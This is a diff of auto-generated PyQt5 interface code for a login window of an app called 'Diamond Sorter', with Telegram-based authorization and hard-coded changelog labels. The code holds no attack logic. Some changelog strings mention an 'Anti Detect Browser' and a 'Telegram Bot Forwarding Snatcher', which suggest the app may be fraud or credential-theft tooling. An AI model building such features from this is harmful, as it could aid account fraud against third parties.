icon.addPixmap(QtGui.QPixmap("../../../OneDrive/Documents/New Structure/icons/exit-to-app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) - self.login_tab_widget.addTab(self.tab, icon, "") - self.information_tab2 = QtWidgets.QWidget() - self.information_tab2.setObjectName("information_tab2") - self.tab_2_widget_holder = QAxContainer.QAxWidget(self.information_tab2) - self.tab_2_widget_holder.setProperty("geometry", QtCore.QRect(10, 170, 391, 391)) - self.tab_2_widget_holder.setObjectName("tab_2_widget_holder") - icon1 = QtGui.QIcon() - icon1.addPixmap(QtGui.QPixmap("../../../OneDrive/Documents/New Structure/icons/go-back.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) - self.login_tab_widget.addTab(self.information_tab2, icon1, "") - self.tab_2 = QtWidgets.QWidget() - self.tab_2.setObjectName("tab_2") - self.login_tab_widget.addTab(self.tab_2, "") - self.program_description = QtWidgets.QLabel(self.centralwidget) - self.program_description.setGeometry(QtCore.QRect(70, 30, 241, 50)) - font = QtGui.QFont() - font.setPointSize(10) - font.setBold(True) - self.program_description.setFont(font) - self.program_description.setStyleSheet("color:rgba(255, 255, 255, 170);") - self.program_description.setObjectName("program_description") - self.program_title = QtWidgets.QLabel(self.centralwidget) - self.program_title.setGeometry(QtCore.QRect(330, 30, 231, 81)) - font = QtGui.QFont() - font.setPointSize(22) - font.setBold(True) - self.program_title.setFont(font) - self.program_title.setStyleSheet("color:rgba(255, 255, 255, 200);") - self.program_title.setObjectName("program_title") - self.system_updates = QtWidgets.QFrame(self.centralwidget) - self.system_updates.setGeometry(QtCore.QRect(60, 150, 511, 381)) - self.system_updates.setFrameShape(QtWidgets.QFrame.StyledPanel) - self.system_updates.setFrameShadow(QtWidgets.QFrame.Raised) - self.system_updates.setObjectName("system_updates") - self.updates_label = QtWidgets.QLabel(self.system_updates) - self.updates_label.setGeometry(QtCore.QRect(200, 10, 91, 31)) - font = QtGui.QFont() - font.setFamily("HACKED") - font.setPointSize(22) - self.updates_label.setFont(font) - self.updates_label.setObjectName("updates_label") - self.update_1_label = QtWidgets.QLabel(self.system_updates) - self.update_1_label.setGeometry(QtCore.QRect(10, 60, 241, 91)) - self.update_1_label.setObjectName("update_1_label") - self.update_2_label = QtWidgets.QLabel(self.system_updates) - self.update_2_label.setGeometry(QtCore.QRect(10, 140, 241, 91)) - self.update_2_label.setObjectName("update_2_label") - self.update_3_label = QtWidgets.QLabel(self.system_updates) - self.update_3_label.setGeometry(QtCore.QRect(10, 230, 241, 91)) - self.update_3_label.setObjectName("update_3_label") - self.update_1_label_2 = QtWidgets.QLabel(self.system_updates) - self.update_1_label_2.setGeometry(QtCore.QRect(270, 60, 241, 91)) - self.update_1_label_2.setObjectName("update_1_label_2") - self.update_1_label_3 = QtWidgets.QLabel(self.system_updates) - self.update_1_label_3.setGeometry(QtCore.QRect(260, 150, 241, 91)) - self.update_1_label_3.setObjectName("update_1_label_3") - self.update_1_label_4 = QtWidgets.QLabel(self.system_updates) - self.update_1_label_4.setGeometry(QtCore.QRect(270, 250, 241, 91)) - self.update_1_label_4.setObjectName("update_1_label_4") - self.program_backdrop = QtWidgets.QLabel(self.centralwidget) - self.program_backdrop.setGeometry(QtCore.QRect(60, 20, 511, 130)) - self.program_backdrop.setStyleSheet("background-color:rgba(0, 0, 0, 75);") - self.program_backdrop.setText("") - self.program_backdrop.setObjectName("program_backdrop") - MainWindow.setCentralWidget(self.centralwidget) - self.statusbar = QtWidgets.QStatusBar(MainWindow) - self.statusbar.setObjectName("statusbar") - MainWindow.setStatusBar(self.statusbar) - - self.retranslateUi(MainWindow) - self.login_tab_widget.setCurrentIndex(0) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - - def retranslateUi(self, MainWindow): - _translate = QtCore.QCoreApplication.translate - MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) - self.c_label_button.setText(_translate("MainWindow", "C")) - self.u_label_button.setText(_translate("MainWindow", "U")) - self.o_label_button.setText(_translate("MainWindow", "O")) - self.login_label.setText(_translate("MainWindow", "Log In")) - self.S_label_button.setText(_translate("MainWindow", "S")) - self.r_label_button.setText(_translate("MainWindow", "R")) - self.Forgot_username_label.setText(_translate("MainWindow", "Forgot your User Name or password?")) - self.e_label_button.setText(_translate("MainWindow", "E")) - self.want_to_register_button.setText(_translate("MainWindow", "Want to Register?")) - self.d_label_button.setText(_translate("MainWindow", "D")) - self.o_label_button_2.setText(_translate("MainWindow", "O")) - self.P_label_button.setText(_translate("MainWindow", "P")) - self.E_label_button.setText(_translate("MainWindow", "E")) - self.N_label_button.setText(_translate("MainWindow", "N")) - self.update_1_label_5.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_3_label_2.setText(_translate("MainWindow", "T.B.A")) - self.program_description_2.setText(_translate("MainWindow", "Hi,\n" -"Welcome to Diamond Sorter channel.\n" -"Don\'t forget to subscribe.")) - self.update_1_label_7.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_2_label_2.setText(_translate("MainWindow", "1/14/24\n" -"- Developed Telegram Licensing Bot\n" -"- Added the 5 Feature Extensions\n" -"- Updated Anti Detect Browser\n" -"- Added Telegram Bot Forwarding Snatcher")) - self.update_1_label_8.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_1_label_9.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.program_title_2.setText(_translate("MainWindow", "Diamond💎\n" -" Sorter")) - self.lineEdit.setText(_translate("MainWindow", "Telegram login (without \"@\")")) - self.pushButton.setText(_translate("MainWindow", "Authorization")) - self.login_tab_widget.setTabText(self.login_tab_widget.indexOf(self.tab), _translate("MainWindow", "Login")) - self.login_tab_widget.setTabText(self.login_tab_widget.indexOf(self.information_tab2), _translate("MainWindow", "Information")) - self.login_tab_widget.setTabText(self.login_tab_widget.indexOf(self.tab_2), _translate("MainWindow", "Project Information + Updates")) - self.program_description.setText(_translate("MainWindow", "Hi,\n" -"Welcome to Diamond Sorter channel.\n" -"Don\'t forget to subscribe.")) - self.program_title.setText(_translate("MainWindow", "Diamond💎\n" -" Sorter")) - self.updates_label.setText(_translate("MainWindow", "Updates")) - self.update_1_label.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_2_label.setText(_translate("MainWindow", "1/14/24\n" -"- Developed Telegram Licensing Bot\n" -"- Added the 5 Feature Extensions\n" -"- Updated Anti Detect Browser\n" -"- Added Telegram Bot Forwarding Snatcher")) - self.update_3_label.setText(_translate("MainWindow", "T.B.A")) - self.update_1_label_2.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_1_label_3.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) - self.update_1_label_4.setText(_translate("MainWindow", "1/12/24\n" -"-Launched to Pre-Release of DIamond Sorter\n" -"-Configured Licensing System\n" -"-Developed Login GUI")) -from PyQt5 import QAxContainer - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) +# -*- coding: utf-8 -*- + +# Form implementation generated from reading ui file 'LoginCheked_UI.ui' +# +# Created by: PyQt5 UI code generator 5.15.9 +# +# WARNING: Any manual changes made to this file will be lost when pyuic5 is +# run again. Do not edit this file unless you know what you are doing. + + +from PyQt5 import QtCore, QtGui, QtWidgets +from PyQt5 import QAxContainer + + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName("MainWindow") + MainWindow.resize(476, 801) + MainWindow.setStyleSheet(" background-color: #232629;\n" +" color: #ffffff;") + self.centralwidget = QtWidgets.QWidget(MainWindow) + self.centralwidget.setObjectName("centralwidget") + self.login_tab_widget = QtWidgets.QTabWidget(self.centralwidget) + self.login_tab_widget.setGeometry(QtCore.QRect(0, 0, 471, 601)) + self.login_tab_widget.setTabPosition(QtWidgets.QTabWidget.East) + self.login_tab_widget.setTabShape(QtWidgets.QTabWidget.Triangular) + self.login_tab_widget.setTabsClosable(True) + self.login_tab_widget.setTabBarAutoHide(True) + self.login_tab_widget.setObjectName("login_tab_widget") + self.tab = QtWidgets.QWidget() + self.tab.setObjectName("tab") + self.c_label_button = QtWidgets.QPushButton(self.tab) + self.c_label_button.setGeometry(QtCore.QRect(230, 500, 30, 30)) + self.c_label_button.setMaximumSize(QtCore.QSize(30, 30)) + palette = QtGui.QPalette() + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) + self.c_label_button.setPalette(palette) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.c_label_button.setFont(font) + self.c_label_button.setMouseTracking(True) + self.c_label_button.setCheckable(False) + self.c_label_button.setObjectName("c_label_button") + self.u_label_button = QtWidgets.QPushButton(self.tab) + self.u_label_button.setGeometry(QtCore.QRect(130, 500, 30, 30)) + self.u_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.u_label_button.setFont(font) + self.u_label_button.setCheckable(False) + self.u_label_button.setChecked(False) + self.u_label_button.setObjectName("u_label_button") + self.o_label_button = QtWidgets.QPushButton(self.tab) + self.o_label_button.setGeometry(QtCore.QRect(80, 500, 30, 30)) + self.o_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.o_label_button.setFont(font) + self.o_label_button.setObjectName("o_label_button") + self.login_label = QtWidgets.QLabel(self.tab) + self.login_label.setGeometry(QtCore.QRect(90, 0, 241, 40)) + font = QtGui.QFont() + font.setPointSize(20) + font.setBold(True) + self.login_label.setFont(font) + self.login_label.setStyleSheet("color:rgba(0, 0, 0, 200);") + self.login_label.setObjectName("login_label") + self.S_label_button = QtWidgets.QPushButton(self.tab) + self.S_label_button.setGeometry(QtCore.QRect(30, 500, 30, 30)) + self.S_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.S_label_button.setFont(font) + self.S_label_button.setObjectName("S_label_button") + self.r_label_button = QtWidgets.QPushButton(self.tab) + self.r_label_button.setGeometry(QtCore.QRect(180, 500, 30, 30)) + self.r_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.r_label_button.setFont(font) + self.r_label_button.setObjectName("r_label_button") + self.Forgot_username_label = QtWidgets.QLabel(self.tab) + self.Forgot_username_label.setGeometry(QtCore.QRect(110, 370, 201, 16)) + self.Forgot_username_label.setStyleSheet("color:rgba(0, 0, 0, 210);") + self.Forgot_username_label.setObjectName("Forgot_username_label") + self.e_label_button = QtWidgets.QPushButton(self.tab) + self.e_label_button.setGeometry(QtCore.QRect(280, 500, 30, 30)) + self.e_label_button.setMaximumSize(QtCore.QSize(30, 30)) + palette = QtGui.QPalette() + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) + self.e_label_button.setPalette(palette) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.e_label_button.setFont(font) + self.e_label_button.setMouseTracking(True) + self.e_label_button.setCheckable(False) + self.e_label_button.setObjectName("e_label_button") + self.want_to_register_button = QtWidgets.QLabel(self.tab) + self.want_to_register_button.setGeometry(QtCore.QRect(140, 400, 101, 16)) + self.want_to_register_button.setStyleSheet("color:rgba(0, 0, 0, 210);") + self.want_to_register_button.setObjectName("want_to_register_button") + self.d_label_button = QtWidgets.QPushButton(self.tab) + self.d_label_button.setGeometry(QtCore.QRect(330, 500, 30, 30)) + self.d_label_button.setMaximumSize(QtCore.QSize(30, 30)) + palette = QtGui.QPalette() + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) + brush = QtGui.QBrush(QtGui.QColor(35, 38, 41)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush) + brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128)) + brush.setStyle(QtCore.Qt.SolidPattern) + palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush) + self.d_label_button.setPalette(palette) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.d_label_button.setFont(font) + self.d_label_button.setMouseTracking(True) + self.d_label_button.setCheckable(False) + self.d_label_button.setObjectName("d_label_button") + self.o_label_button_2 = QtWidgets.QPushButton(self.tab) + self.o_label_button_2.setGeometry(QtCore.QRect(100, 440, 30, 30)) + self.o_label_button_2.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.o_label_button_2.setFont(font) + self.o_label_button_2.setObjectName("o_label_button_2") + self.P_label_button = QtWidgets.QPushButton(self.tab) + self.P_label_button.setGeometry(QtCore.QRect(150, 440, 30, 30)) + self.P_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.P_label_button.setFont(font) + self.P_label_button.setObjectName("P_label_button") + self.E_label_button = QtWidgets.QPushButton(self.tab) + self.E_label_button.setGeometry(QtCore.QRect(200, 440, 30, 30)) + self.E_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.E_label_button.setFont(font) + self.E_label_button.setObjectName("E_label_button") + self.N_label_button = QtWidgets.QPushButton(self.tab) + self.N_label_button.setGeometry(QtCore.QRect(250, 440, 30, 30)) + self.N_label_button.setMaximumSize(QtCore.QSize(30, 30)) + font = QtGui.QFont() + font.setFamily("Social Media Circled") + font.setPointSize(15) + self.N_label_button.setFont(font) + self.N_label_button.setObjectName("N_label_button") + self.backdrop_holder_2 = QtWidgets.QLabel(self.tab) + self.backdrop_holder_2.setGeometry(QtCore.QRect(-540, -10, 531, 611)) + self.backdrop_holder_2.setStyleSheet("background-color:rgba(0, 0, 0, 80);\n" +"border-top-left-radius: 50px;") + self.backdrop_holder_2.setText("") + self.backdrop_holder_2.setObjectName("backdrop_holder_2") + self.update_1_label_5 = QtWidgets.QLabel(self.tab) + self.update_1_label_5.setGeometry(QtCore.QRect(-520, 200, 241, 91)) + self.update_1_label_5.setObjectName("update_1_label_5") + self.update_3_label_2 = QtWidgets.QLabel(self.tab) + self.update_3_label_2.setGeometry(QtCore.QRect(-520, 370, 241, 91)) + self.update_3_label_2.setObjectName("update_3_label_2") + self.program_description_2 = QtWidgets.QLabel(self.tab) + self.program_description_2.setGeometry(QtCore.QRect(-521, 60, 241, 50)) + font = QtGui.QFont() + font.setPointSize(10) + font.setBold(True) + self.program_description_2.setFont(font) + self.program_description_2.setStyleSheet("color:rgba(255, 255, 255, 170);") + self.program_description_2.setObjectName("program_description_2") + self.program_stats_frame_2 = QtWidgets.QFrame(self.tab) + self.program_stats_frame_2.setGeometry(QtCore.QRect(-530, 540, 511, 51)) + self.program_stats_frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel) + self.program_stats_frame_2.setFrameShadow(QtWidgets.QFrame.Raised) + self.program_stats_frame_2.setObjectName("program_stats_frame_2") + self.update_1_label_7 = QtWidgets.QLabel(self.tab) + self.update_1_label_7.setGeometry(QtCore.QRect(-270, 290, 241, 91)) + self.update_1_label_7.setObjectName("update_1_label_7") + self.update_2_label_2 = QtWidgets.QLabel(self.tab) + self.update_2_label_2.setGeometry(QtCore.QRect(-520, 280, 241, 91)) + self.update_2_label_2.setObjectName("update_2_label_2") + self.update_1_label_8 = QtWidgets.QLabel(self.tab) + self.update_1_label_8.setGeometry(QtCore.QRect(-260, 390, 241, 91)) + self.update_1_label_8.setObjectName("update_1_label_8") + self.update_1_label_9 = QtWidgets.QLabel(self.tab) + self.update_1_label_9.setGeometry(QtCore.QRect(-260, 200, 241, 91)) + self.update_1_label_9.setObjectName("update_1_label_9") + self.program_backdrop_2 = QtWidgets.QLabel(self.tab) + self.program_backdrop_2.setGeometry(QtCore.QRect(-530, 0, 521, 130)) + self.program_backdrop_2.setStyleSheet("background-color:rgba(0, 0, 0, 75);") + self.program_backdrop_2.setText("") + self.program_backdrop_2.setObjectName("program_backdrop_2") + self.program_title_2 = QtWidgets.QLabel(self.tab) + self.program_title_2.setGeometry(QtCore.QRect(-260, 10, 231, 81)) + font = QtGui.QFont() + font.setPointSize(22) + font.setBold(True) + self.program_title_2.setFont(font) + self.program_title_2.setStyleSheet("color:rgba(255, 255, 255, 200);") + self.program_title_2.setObjectName("program_title_2") + self.authorization_button = QtWidgets.QPushButton(self.tab) + self.authorization_button.setGeometry(QtCore.QRect(40, 270, 341, 41)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.authorization_button.setFont(font) + self.authorization_button.setStyleSheet(" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"") + self.authorization_button.setCheckable(True) + self.authorization_button.setDefault(False) + self.authorization_button.setObjectName("authorization_button") + icon = QtGui.QIcon() + icon.addPixmap(QtGui.QPixmap("../../../OneDrive/Documents/New Structure/icons/exit-to-app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) + self.login_tab_widget.addTab(self.tab, icon, "") + self.information_tab2 = QtWidgets.QWidget() + self.information_tab2.setObjectName("information_tab2") + 